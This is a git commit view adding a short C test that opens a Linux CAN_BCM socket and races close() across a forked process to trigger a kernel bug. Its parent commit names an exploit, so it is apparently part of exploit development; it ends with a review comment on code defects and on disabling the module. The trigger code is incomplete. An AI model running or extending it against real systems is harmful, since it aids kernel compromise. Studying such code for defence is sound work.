| author | 2011-04-20 18:06:01 -0400 | |
|---|---|---|
| committer | 2011-04-20 18:06:01 -0400 | |
| commit | 30a4cec8986bf490a24b20c0063d07b1e953698c (patch) | |
| tree | 7beaeb6539cbc277eea632e8e2f75458f07e9a8a | |
| parent | Pidmap deref in the exploit. (diff) | |
| -rw-r--r-- | bcm_test.c | 45 |
1 files changed, 45 insertions, 0 deletions
diff --git a/bcm_test.c b/bcm_test.c
new file mode 100644
index 0000000..c0b72d9
--- /dev/null
+++ b/bcm_test.c
@@ -0,0 +1,45 @@
+#include <stdio.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <linux/can.h>
+#include <linux/can/raw.h>
+
+#ifndef PF_CAN
+#define PF_CAN 29
+#endif
+
+#ifndef CAN_BCM
+#define CAN_BCM 2
+#endif
+
+int main()
+{
+ printf("[+] Creating BCM CAN socket.\n");
+ int sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
+ if (sock < 0) {
+ printf("[-] No BCM CAN support.\n");
+ return -1;
+ }
+
+ printf("[+] Connecting to socket.\n");
+ struct sockaddr_can addr;
+ memset(&addr, 0, sizeof(addr));
+ addr.can_family = PF_CAN;
+ connect(sock, (struct sockaddr *)&addr, sizeof(addr));
+
+ printf("[+] Triggering the bug.\n");
+ if (fork()) {
+ //TODO: Somehow jam the locking mechanism so release_sock hangs.
+ close(sock);
+ } else {
+ sleep(2);
+ close(sock);
+ _exit(0);
+ }
+ sleep(5);
+
+ return 0;
+}
 |
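Review bot: `fork`, `close`, `sleep` and `_exit` are called in `main` without `<unistd.h>`, so they are implicitly declared; add `#include <unistd.h>` next to the other includes. The return values of `connect()` and `fork()` are also ignored: a failed `connect()` still prints "[+] Triggering the bug.", and a `fork()` that returns -1 takes the parent branch, so the output says nothing reliable about what happened after the `socket()` call. A guard such as `if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("connect"); close(sock); return -1; }` would make the failure visible, and the parent could `wait()` for the child instead of relying on `sleep(5)`. As committed, the only dependable signal is the first check, whether this process can create a `CAN_BCM` socket at all; on hosts that do not use CAN, a success there is a reason to keep that protocol module from loading.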
